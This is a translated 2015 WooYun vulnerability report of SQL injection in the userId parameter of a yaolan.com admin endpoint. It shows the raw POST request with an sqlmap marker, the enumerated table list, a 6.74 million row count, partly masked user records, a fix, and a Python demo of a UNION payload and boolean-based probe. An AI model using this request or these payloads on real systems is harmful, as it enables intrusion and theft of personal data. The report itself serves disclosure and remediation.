
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0118883

Title: MySQL injection on a 摇篮网 (yaolan.com) site (large volume of user data involved)

Vendor: 摇篮网 (yaolan.com)

Author: lijiejie

Submitted: 2015-06-07 21:26

Fixed: 2015-07-23 17:22

Published: 2015-07-23 17:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-06-07: Details sent to the vendor, awaiting vendor action
2015-06-08: Vendor confirmed; details visible to the vendor only
2015-06-18: Details disclosed to core white hats and domain experts
2015-06-28: Details disclosed to regular white hats
2015-07-08: Details disclosed to intern white hats
2015-07-23: Details disclosed to the public

Brief description:

MySQL injection on a yaolan.com site (6.74 million user records can be dumped). The database holds user passwords, e-mail addresses, mobile numbers, QQ numbers and other profile data.

Detailed description:

The injection point is in the admin backend at http://jifen.yaolan.com/admin.php?r=site/login. The injectable parameter is userId in the POST body of the site/GetUserCoin action; in the request below the asterisk is sqlmap's custom injection-point marker, standing where the payload goes:

POST /admin.php?r=site/GetUserCoin HTTP/1.1
Content-Length: 141
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://jifen.yaolan.com
Cookie: PHPSESSID=eqffbvsjk3ardoggo834p3g3v5
Host: jifen.yaolan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
userId=*

Proof of vulnerability:

current user:    'userweb@%'
current database: 'user_yaolan_com'
Database: user_yaolan_com
[31 tables]
+-------------------------+
| BoroughList |
| ChildInfo |
| ChildInterestDetailList |
| ChildInterestInfo |
| ChildInterestList |
| CityList |
| CoinInfo |
| CountryList |
| EducationList |
| GeekList |
| GradeList |
| IncomeList |
| LoginInfo |
| MarkInfo |
| NoDefaultChildInfo |
| ProfessionList |
| ProvinceList |
| TradeList |
| UserBaseInfo |
| UserExtInfo |
| UserGeekDetail |
| UserInterestDetailList |
| UserInterestInfo |
| UserInterestList |
| UserSignature |
| UserSource |
| UserVerifyDetail |
| VerifyList |
| iur_child_birth_based |
| sysdiagrams |
| word_filter_reg |
+-------------------------+
Database: user_yaolan_com
+-----------+---------+
| Table | Entries |
+-----------+---------+
| LoginInfo | 6741020 |
+-----------+---------+


The LoginInfo table holds user passwords; the UserBaseInfo and UserExtInfo tables hold personal profile data: e-mail address, mobile number, QQ number, postal address and so on.
As a sample, 10 records were pulled starting at row 1,000,000 (rows 1,000,000 to 1,000,010):

Masked region
*****Bind,ModifiedDate,MSN,NickNameLastModifiedTime,PostalAd*****
*****ot;,"NULL","NULL","NULL","163002","0&qu*****
*****0","NULL","NULL","NULL","NULL","*****
*****","NULL","NULL","NULL","317000",&quot*****
*****0","NULL","NULL","NULL","NULL","*****
*****ot;,"NULL","NULL","NULL","100091","0&q*****
*****0","NULL","NULL","NULL","NULL","0*****
*****00","NULL","NULL","NULL","510650",&quot*****
*****00","NULL","NULL","NULL","NULL","*****
*****00","NULL","NULL","NULL","NULL",&quot*****
*****;,"NULL","NULL","NULL","466200","0&quot*****
**********
*****d,RegDate,RegIp,ResetP*****
*****6c16b2","2003-10-10 14:00:49",&qu*****
*****f81dc7","2003-10-16 10:34:23",&qu*****
*****9efbae","2005-03-23 16:50:43",&qu*****
*****421f50","2003-11-11 15:32:21",&qu*****
*****3f09b9","2003-10-31 18:34:07",&qu*****
*****2f806b","2004-02-02 16:48:05",&qu*****
*****54db06","2003-10-27 08:31:31",&qu*****
*****06c118","2004-06-07 11:01:28",&qu*****
*****4a1a6e","2004-04-27 14:12:17",&qu*****
*****cod*****


Fix:

Filter the parameter: reject any userId that is not a plain integer, and bind it with a prepared statement instead of concatenating it into the SQL string.
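As an added illustration (this is not yaolan.com's code and is not taken from the report), the following models the GetUserCoin handler in Python over an in-memory SQLite database: the vulnerable string-concatenation form beside the filtered-and-bound form, a UNION payload in userId that pulls LoginInfo through the vulnerable form, and the boolean-based check (1 AND 1=1 versus 1 AND 1=2) a tester uses to confirm the injection by hand. The table names CoinInfo and LoginInfo come from the report's table listing; the column names, the sample rows and the SQLite `||` concatenation (CONCAT() in MySQL) are assumptions made for the demo.

```python
import re
import sqlite3

# Constructed sample data. The table names CoinInfo and LoginInfo appear
# in the report; the column names and row contents are assumptions.
SCHEMA = """
CREATE TABLE CoinInfo  (UserId INTEGER PRIMARY KEY, Coin INTEGER);
CREATE TABLE LoginInfo (UserId INTEGER PRIMARY KEY, UserName TEXT, Passwd TEXT);
INSERT INTO CoinInfo VALUES (1, 120), (2, 55), (3, 0);
INSERT INTO LoginInfo VALUES
  (1, 'alice', '5f4dcc3b5aa765d61d8327deb882cf99'),
  (2, 'bob',   'e10adc3949ba59abbe56e057f20f883e'),
  (3, 'carol', '25d55ad283aa400af464c76d713c07ad');
"""

# Hypothetical attacker value for the userId field. On MySQL the
# concatenation would be CONCAT(UserName, ':', Passwd); SQLite uses ||.
UNION_PAYLOAD = "1 UNION SELECT UserName || ':' || Passwd FROM LoginInfo"


def open_db():
    """In-memory stand-in for the user_yaolan_com database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def get_user_coin_vulnerable(conn, user_id):
    """The injectable pattern: the raw POST value is spliced into the SQL,
    so anything after the number runs as part of the query."""
    sql = "SELECT Coin FROM CoinInfo WHERE UserId = " + user_id
    return [row[0] for row in conn.execute(sql)]


def get_user_coin_fixed(conn, user_id):
    """Parameter filtering plus binding: the value must be a decimal
    integer, and it reaches the engine as a bound parameter, never as
    SQL text."""
    if not re.fullmatch(r"[0-9]{1,18}", user_id):
        raise ValueError("userId must be a decimal integer")
    sql = "SELECT Coin FROM CoinInfo WHERE UserId = ?"
    return [row[0] for row in conn.execute(sql, (int(user_id),))]


def is_injectable(handler, conn):
    """Boolean-based confirmation: two values that differ only in SQL
    truth value give different results from an injectable handler and
    the same treatment from a safe one."""
    try:
        when_true = handler(conn, "1 AND 1=1")
        when_false = handler(conn, "1 AND 1=2")
    except ValueError:
        return False  # rejected outright: the value never reached SQL
    return when_true != when_false


def rejects(handler, conn, user_id):
    """True if the handler refuses the value instead of executing it."""
    try:
        handler(conn, user_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    conn = open_db()
    print("vulnerable, userId=1   :", get_user_coin_vulnerable(conn, "1"))
    print("vulnerable, UNION      :", get_user_coin_vulnerable(conn, UNION_PAYLOAD))
    print("vulnerable injectable? :", is_injectable(get_user_coin_vulnerable, conn))
    print("fixed, userId=1        :", get_user_coin_fixed(conn, "1"))
    print("fixed rejects UNION?   :", rejects(get_user_coin_fixed, conn, UNION_PAYLOAD))
    print("fixed injectable?      :", is_injectable(get_user_coin_fixed, conn))
```

Against the vulnerable handler the UNION value returns the legitimate coin balance plus one row per LoginInfo user, which is the same mechanism that let a single POST parameter enumerate 31 tables and 6.74 million LoginInfo rows in the report. The fixed handler refuses the value before any SQL is built, so the boolean-based probe sees no difference to work with; the integer check is the "parameter filtering" of the fix and the bound parameter is what makes it robust even if the check were loosened later.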

Copyright notice: when reposting, credit the source: lijiejie@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-06-08 17:21

Vendor reply:

Vulnerability confirmed, fix in progress. Thanks to the WooYun white hat for the heads-up.

Latest status:

None yet